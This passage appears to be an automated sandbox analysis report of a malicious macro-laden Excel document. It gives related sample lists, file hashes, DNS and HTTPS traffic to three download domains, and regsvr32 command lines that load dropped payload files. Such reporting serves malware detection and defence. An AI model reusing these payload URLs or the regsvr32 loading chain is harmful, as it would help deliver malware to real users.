                          6Y5P9BoimMLclbt.exeGet hashmaliciousBrowse
                          • 101.0.117.102
                          gunzipped.exeGet hashmaliciousBrowse
                          • 101.0.117.102
                          SecuriteInfo.com.Variant.Bulz.627351.21436.exeGet hashmaliciousBrowse
                          • 101.0.117.102
                          ENQUIRY.exeGet hashmaliciousBrowse
                          • 101.0.117.102
                          16wKmiVoPj05ynr.exeGet hashmaliciousBrowse
                          • 101.0.117.102
                          PURCHASE ORDER.exeGet hashmaliciousBrowse
                          • 101.0.117.102
                          PO.NO.V21015.exeGet hashmaliciousBrowse
                          • 101.0.117.102
                          New Inquiry 21411JA20pdf.exeGet hashmaliciousBrowse
                          • 101.0.117.102
                          fsd8ks3VNb.exeGet hashmaliciousBrowse
                          • 101.0.105.170
                          y1FOl1vVPA.exeGet hashmaliciousBrowse
                          • 101.0.86.146
                          UNIFIEDLAYER-AS-1USjjBv8SpZXm.exeGet hashmaliciousBrowse
                          • 192.185.0.218
                          Scan_0978.exeGet hashmaliciousBrowse
                          • 173.254.94.114
                          pKD3j672HL.exeGet hashmaliciousBrowse
                          • 192.185.131.113
                          heiedrNhQ8Get hashmaliciousBrowse
                          • 142.5.140.216
                          Kredi Karti Hesap #U00d6zeti - 4508xxxxxxxx0017.exeGet hashmaliciousBrowse
                          • 192.185.163.68
                          lod2.xlsxGet hashmaliciousBrowse
                          • 162.241.226.37
                          Contract and PO No.908876.exeGet hashmaliciousBrowse
                          • 192.185.84.191
                          iwah6jVhmwGet hashmaliciousBrowse
                          • 98.130.22.83
                          BL-210915L0.exeGet hashmaliciousBrowse
                          • 192.254.180.165
                          mFKC2tSCJXGet hashmaliciousBrowse
                          • 76.163.226.11
                          Urgent Inquiry.exeGet hashmaliciousBrowse
                          • 192.185.84.191
                          PO 007661721.exeGet hashmaliciousBrowse
                          • 192.185.84.191
                          P.I 099880990.xlsxGet hashmaliciousBrowse
                          • 162.214.65.211
                          1QbmrgleyAWkb39.exeGet hashmaliciousBrowse
                          • 192.185.84.191
                          (RG25LGSJ).exeGet hashmaliciousBrowse
                          • 162.241.216.179
                          103 Ref 2853801324189923.exeGet hashmaliciousBrowse
                          • 67.20.76.184
                          doc_0862413890.exeGet hashmaliciousBrowse
                          • 74.220.199.6
                          swift.Telex.xlsGet hashmaliciousBrowse
                          • 192.185.115.3
                          g4225Fz3HKGet hashmaliciousBrowse
                          • 162.214.19.189
                          HBL-21706385 INV_2.exeGet hashmaliciousBrowse
                          • 192.254.180.165

                          JA3 Fingerprints

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          7dcce5b76c8b17472d024758970a406bINV.pptGet hashmaliciousBrowse
                          • 101.0.112.4
                          • 108.179.242.179
                          • 172.93.99.178
                          Purchase Order .xlsxGet hashmaliciousBrowse
                          • 101.0.112.4
                          • 108.179.242.179
                          • 172.93.99.178
                          MV JOLLY EXPRESS.docxGet hashmaliciousBrowse
                          • 101.0.112.4
                          • 108.179.242.179
                          • 172.93.99.178
                          DHL_Delivery_Notification.docGet hashmaliciousBrowse
                          • 101.0.112.4
                          • 108.179.242.179
                          • 172.93.99.178
                          FedEx AWB 884174658339.docGet hashmaliciousBrowse
                          • 101.0.112.4
                          • 108.179.242.179
                          • 172.93.99.178
                          UPDATE INVOICE FM K & S INDUSTRY.docxGet hashmaliciousBrowse
                          • 101.0.112.4
                          • 108.179.242.179
                          • 172.93.99.178
                          PO 347391.docxGet hashmaliciousBrowse
                          • 101.0.112.4
                          • 108.179.242.179
                          • 172.93.99.178
                          swift.Telex.xlsGet hashmaliciousBrowse
                          • 101.0.112.4
                          • 108.179.242.179
                          • 172.93.99.178
                          Invoice number 1257MAJAKFVII2021 incl. VAT.docGet hashmaliciousBrowse
                          • 101.0.112.4
                          • 108.179.242.179
                          • 172.93.99.178
                          Consignment Notification.docGet hashmaliciousBrowse
                          • 101.0.112.4
                          • 108.179.242.179
                          • 172.93.99.178
                          RFQ87976VF.docGet hashmaliciousBrowse
                          • 101.0.112.4
                          • 108.179.242.179
                          • 172.93.99.178
                          RFQPTD0075453423.docGet hashmaliciousBrowse
                          • 101.0.112.4
                          • 108.179.242.179
                          • 172.93.99.178
                          F#U0130YAT TEKL#U0130F#U0130 FORMU.docGet hashmaliciousBrowse
                          • 101.0.112.4
                          • 108.179.242.179
                          • 172.93.99.178
                          CONTRACT 0902021.docGet hashmaliciousBrowse
                          • 101.0.112.4
                          • 108.179.242.179
                          • 172.93.99.178
                          PO006237_2nd Shipment.docxGet hashmaliciousBrowse
                          • 101.0.112.4
                          • 108.179.242.179
                          • 172.93.99.178
                          sample.exeGet hashmaliciousBrowse
                          • 101.0.112.4
                          • 108.179.242.179
                          • 172.93.99.178
                          avec.xlsxGet hashmaliciousBrowse
                          • 101.0.112.4
                          • 108.179.242.179
                          • 172.93.99.178
                          SecuriteInfo.com.Trojan.GenericKD.37622653.5338.xlsmGet hashmaliciousBrowse
                          • 101.0.112.4
                          • 108.179.242.179
                          • 172.93.99.178
                          SecuriteInfo.com.Trojan.GenericKD.37622653.5338.xlsmGet hashmaliciousBrowse
                          • 101.0.112.4
                          • 108.179.242.179
                          • 172.93.99.178
                          PO no 275.xlsxGet hashmaliciousBrowse
                          • 101.0.112.4
                          • 108.179.242.179
                          • 172.93.99.178

                          Dropped Files

                          No context

                          Created / dropped Files

                          No created / dropped files found

                          Static File Info

                          General

                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Tue Oct 12 08:22:59 2021, Security: 0
                          Entropy (8bit):7.531872402672375
                          TrID:
                          • Microsoft Excel sheet (30009/1) 78.94%
                          • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                          File name:doc-220808714.xls
                          File size:241152
                          MD5:2654fdca7197f542cbd0be823a2a2a9f
                          SHA1:149b43a5f8f4d9bd63720b408f6c4e2a86401c6a
                          SHA256:f5a313c5353ae0d1cede7bd5e234bfd3a4d7abb5e877bd2903d8d7572e9ee4d6
                          SHA512:1534994b08b95c1a9879afba6a857817146b3aaa06484a65ff89f418b5ca31fa7ffbc2076efdface8f0036f5e3a7f98e95fe0120df3bfe2c2b06ea8e3b96bcaf
                          SSDEEP:6144:cKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgq9jWXcZZRBTq1BOzTwvOsPDslAvS32vI7p:09jVzTmszTwvTDy33LvfP1OWr
                          File Content Preview:........................>......................................................................................................................................................................................................................................

                          File Icon

                          Icon Hash:e4eea286a4b4bcb4

                          Static OLE Info

                          General

                          Document Type:OLE
                          Number of OLE Files:1

                          OLE File "doc-220808714.xls"

                          Indicators

                          Has Summary Info:True
                          Application Name:Microsoft Excel
                          Encrypted Document:False
                          Contains Word Document Stream:False
                          Contains Workbook/Book Stream:True
                          Contains PowerPoint Document Stream:False
                          Contains Visio Document Stream:False
                          Contains ObjectPool Stream:
                          Flash Objects Count:
                          Contains VBA Macros:True

                          Summary

                          Code Page:1251
                          Author:
                          Last Saved By:
                          Create Time:2015-06-05 18:19:34
                          Last Saved Time:2021-10-12 07:22:59
                          Creating Application:Microsoft Excel
                          Security:0

                          Document Summary

                          Document Code Page:1251
                          Thumbnail Scaling Desired:False
                          Company:
                          Contains Dirty Links:False
                          Shared Document:False
                          Changed Hyperlinks:False
                          Application Version:1048576

                          Streams

                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                          General
                          Stream Path:\x5DocumentSummaryInformation
                          File Type:data
                          Stream Size:4096
                          Entropy:0.43766981378
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . < . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t . . . . . S i m b b 1 . . . . . S i m b b 2 . . . . . S i m b b 3 . . . . . G G T . . . . . B r e r 1
                          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 3c 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 f9 00 00 00
                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                          General
                          Stream Path:\x5SummaryInformation
                          File Type:data
                          Stream Size:4096
                          Entropy:0.279171118094
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ? R , . . . . @ . . . . . . . 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                          Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 229526
                          General
                          Stream Path:Workbook
                          File Type:Applesoft BASIC program data, first line number 16
                          Stream Size:229526
                          Entropy:7.71393359025
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . . . 4 . < . 8 . = . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . . X . @ . . . . .
                          Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 01 10 04 34 04 3c 04 38 04 3d 04 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                          Network Behavior

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Oct 12, 2021 17:13:40.015114069 CEST49165443192.168.2.22172.93.99.178
                          Oct 12, 2021 17:13:40.015177011 CEST44349165172.93.99.178192.168.2.22
                          Oct 12, 2021 17:13:40.015268087 CEST49165443192.168.2.22172.93.99.178
                          Oct 12, 2021 17:13:40.023870945 CEST49165443192.168.2.22172.93.99.178
                          Oct 12, 2021 17:13:40.023914099 CEST44349165172.93.99.178192.168.2.22
                          Oct 12, 2021 17:13:40.250966072 CEST44349165172.93.99.178192.168.2.22
                          Oct 12, 2021 17:13:40.251070976 CEST49165443192.168.2.22172.93.99.178
                          Oct 12, 2021 17:13:40.265047073 CEST49165443192.168.2.22172.93.99.178
                          Oct 12, 2021 17:13:40.265084982 CEST44349165172.93.99.178192.168.2.22
                          Oct 12, 2021 17:13:40.265454054 CEST44349165172.93.99.178192.168.2.22
                          Oct 12, 2021 17:13:40.265526056 CEST49165443192.168.2.22172.93.99.178
                          Oct 12, 2021 17:13:40.503371000 CEST49165443192.168.2.22172.93.99.178
                          Oct 12, 2021 17:13:40.551132917 CEST44349165172.93.99.178192.168.2.22
                          Oct 12, 2021 17:13:41.840105057 CEST44349165172.93.99.178192.168.2.22
                          Oct 12, 2021 17:13:41.840183973 CEST44349165172.93.99.178192.168.2.22
                          Oct 12, 2021 17:13:41.840198994 CEST49165443192.168.2.22172.93.99.178
                          Oct 12, 2021 17:13:41.840249062 CEST49165443192.168.2.22172.93.99.178
                          Oct 12, 2021 17:13:41.840543985 CEST49165443192.168.2.22172.93.99.178
                          Oct 12, 2021 17:13:41.840567112 CEST44349165172.93.99.178192.168.2.22
                          Oct 12, 2021 17:13:41.840590954 CEST49165443192.168.2.22172.93.99.178
                          Oct 12, 2021 17:13:41.840611935 CEST49165443192.168.2.22172.93.99.178
                          Oct 12, 2021 17:13:42.191519022 CEST49166443192.168.2.22101.0.112.4
                          Oct 12, 2021 17:13:42.191562891 CEST44349166101.0.112.4192.168.2.22
                          Oct 12, 2021 17:13:42.191625118 CEST49166443192.168.2.22101.0.112.4
                          Oct 12, 2021 17:13:42.192444086 CEST49166443192.168.2.22101.0.112.4
                          Oct 12, 2021 17:13:42.192461014 CEST44349166101.0.112.4192.168.2.22
                          Oct 12, 2021 17:13:42.823854923 CEST44349166101.0.112.4192.168.2.22
                          Oct 12, 2021 17:13:42.824115038 CEST49166443192.168.2.22101.0.112.4
                          Oct 12, 2021 17:13:42.839334011 CEST49166443192.168.2.22101.0.112.4
                          Oct 12, 2021 17:13:42.839382887 CEST44349166101.0.112.4192.168.2.22
                          Oct 12, 2021 17:13:42.839660883 CEST44349166101.0.112.4192.168.2.22
                          Oct 12, 2021 17:13:42.839787960 CEST49166443192.168.2.22101.0.112.4
                          Oct 12, 2021 17:13:42.858344078 CEST49166443192.168.2.22101.0.112.4
                          Oct 12, 2021 17:13:42.899148941 CEST44349166101.0.112.4192.168.2.22
                          Oct 12, 2021 17:13:45.537420034 CEST44349166101.0.112.4192.168.2.22
                          Oct 12, 2021 17:13:45.537553072 CEST44349166101.0.112.4192.168.2.22
                          Oct 12, 2021 17:13:45.537647009 CEST49166443192.168.2.22101.0.112.4
                          Oct 12, 2021 17:13:45.538012028 CEST49166443192.168.2.22101.0.112.4
                          Oct 12, 2021 17:13:45.538038969 CEST49166443192.168.2.22101.0.112.4
                          Oct 12, 2021 17:13:45.538069010 CEST44349166101.0.112.4192.168.2.22
                          Oct 12, 2021 17:13:45.538081884 CEST49166443192.168.2.22101.0.112.4
                          Oct 12, 2021 17:13:45.538150072 CEST49166443192.168.2.22101.0.112.4
                          Oct 12, 2021 17:13:45.719580889 CEST49167443192.168.2.22108.179.242.179
                          Oct 12, 2021 17:13:45.719633102 CEST44349167108.179.242.179192.168.2.22
                          Oct 12, 2021 17:13:45.719705105 CEST49167443192.168.2.22108.179.242.179
                          Oct 12, 2021 17:13:45.720257044 CEST49167443192.168.2.22108.179.242.179
                          Oct 12, 2021 17:13:45.720288992 CEST44349167108.179.242.179192.168.2.22
                          Oct 12, 2021 17:13:46.048093081 CEST44349167108.179.242.179192.168.2.22
                          Oct 12, 2021 17:13:46.048398018 CEST49167443192.168.2.22108.179.242.179
                          Oct 12, 2021 17:13:46.063859940 CEST49167443192.168.2.22108.179.242.179
                          Oct 12, 2021 17:13:46.063909054 CEST44349167108.179.242.179192.168.2.22
                          Oct 12, 2021 17:13:46.064196110 CEST44349167108.179.242.179192.168.2.22
                          Oct 12, 2021 17:13:46.064332008 CEST49167443192.168.2.22108.179.242.179
                          Oct 12, 2021 17:13:46.068979979 CEST49167443192.168.2.22108.179.242.179
                          Oct 12, 2021 17:13:46.111146927 CEST44349167108.179.242.179192.168.2.22
                          Oct 12, 2021 17:13:46.304980040 CEST44349167108.179.242.179192.168.2.22
                          Oct 12, 2021 17:13:46.305239916 CEST49167443192.168.2.22108.179.242.179
                          Oct 12, 2021 17:13:46.305263996 CEST44349167108.179.242.179192.168.2.22
                          Oct 12, 2021 17:13:46.305320024 CEST49167443192.168.2.22108.179.242.179
                          Oct 12, 2021 17:13:46.305584908 CEST49167443192.168.2.22108.179.242.179
                          Oct 12, 2021 17:13:46.305655003 CEST49167443192.168.2.22108.179.242.179

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Oct 12, 2021 17:13:39.986201048 CEST5216753192.168.2.228.8.8.8
                          Oct 12, 2021 17:13:40.005583048 CEST53521678.8.8.8192.168.2.22
                          Oct 12, 2021 17:13:41.872337103 CEST5059153192.168.2.228.8.8.8
                          Oct 12, 2021 17:13:42.188901901 CEST53505918.8.8.8192.168.2.22
                          Oct 12, 2021 17:13:45.575872898 CEST5780553192.168.2.228.8.8.8
                          Oct 12, 2021 17:13:45.717439890 CEST53578058.8.8.8192.168.2.22

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                          Oct 12, 2021 17:13:39.986201048 CEST192.168.2.228.8.8.80xe415Standard query (0)ohemaa.orgA (IP address)IN (0x0001)
                          Oct 12, 2021 17:13:41.872337103 CEST192.168.2.228.8.8.80xd9e3Standard query (0)madieandme.com.auA (IP address)IN (0x0001)
                          Oct 12, 2021 17:13:45.575872898 CEST192.168.2.228.8.8.80x4c3bStandard query (0)amerident.com.doA (IP address)IN (0x0001)

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                          Oct 12, 2021 17:13:40.005583048 CEST8.8.8.8192.168.2.220xe415No error (0)ohemaa.org172.93.99.178A (IP address)IN (0x0001)
                          Oct 12, 2021 17:13:42.188901901 CEST8.8.8.8192.168.2.220xd9e3No error (0)madieandme.com.au101.0.112.4A (IP address)IN (0x0001)
                          Oct 12, 2021 17:13:45.717439890 CEST8.8.8.8192.168.2.220x4c3bNo error (0)amerident.com.do108.179.242.179A (IP address)IN (0x0001)

                          HTTP Request Dependency Graph

                          • ohemaa.org
                          • madieandme.com.au
                          • amerident.com.do

                          HTTPS Proxied Packets

                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          0192.168.2.2249165172.93.99.178443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          TimestampkBytes transferredDirectionData
                          2021-10-12 15:13:40 UTC0OUTGET /HUVm9mDKLW9C/ocrafhh.html HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: ohemaa.org
                          Connection: Keep-Alive
                          2021-10-12 15:13:41 UTC0INHTTP/1.1 200 OK
                          Connection: close
                          x-powered-by: PHP/5.6.40
                          content-type: text/html; charset=UTF-8
                          content-length: 0
                          date: Tue, 12 Oct 2021 15:13:41 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          1192.168.2.2249166101.0.112.4443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          TimestampkBytes transferredDirectionData
                          2021-10-12 15:13:42 UTC0OUTGET /xnkpOLnvlN6T/ocrafh.html HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: madieandme.com.au
                          Connection: Keep-Alive
                          2021-10-12 15:13:45 UTC1INHTTP/1.1 200 OK
                          Connection: close
                          x-powered-by: PHP/7.2.34
                          content-type: text/html; charset=UTF-8
                          content-length: 0
                          date: Tue, 12 Oct 2021 15:13:45 GMT
                          server: LiteSpeed
                          vary: User-Agent
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          2192.168.2.2249167108.179.242.179443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          TimestampkBytes transferredDirectionData
                          2021-10-12 15:13:46 UTC1OUTGET /xdOMlaB0XJ7/ocraf.html HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: amerident.com.do
                          Connection: Keep-Alive
                          2021-10-12 15:13:46 UTC1INHTTP/1.1 200 OK
                          Date: Tue, 12 Oct 2021 15:13:46 GMT
                          Server: nginx/1.19.10
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 0
                          X-Server-Cache: true
                          X-Proxy-Cache: HIT
                          Connection: close


                          Code Manipulations

                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Start time:17:13:20
                          Start date:12/10/2021
                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          Wow64 process (32bit):false
                          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                          Imagebase:0x13fa70000
                          File size:28253536 bytes
                          MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          General

                          Start time:17:13:29
                          Start date:12/10/2021
                          Path:C:\Windows\System32\regsvr32.exe
                          Wow64 process (32bit):false
                          Commandline:'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test
                          Imagebase:0xff1e0000
                          File size:19456 bytes
                          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:17:13:29
                          Start date:12/10/2021
                          Path:C:\Windows\System32\regsvr32.exe
                          Wow64 process (32bit):false
                          Commandline:'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test
                          Imagebase:0xff1e0000
                          File size:19456 bytes
                          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:17:13:29
                          Start date:12/10/2021
                          Path:C:\Windows\System32\regsvr32.exe
                          Wow64 process (32bit):false
                          Commandline:'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test
                          Imagebase:0xff1e0000
                          File size:19456 bytes
                          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Disassembly

                          Code Analysis

                          Reset < >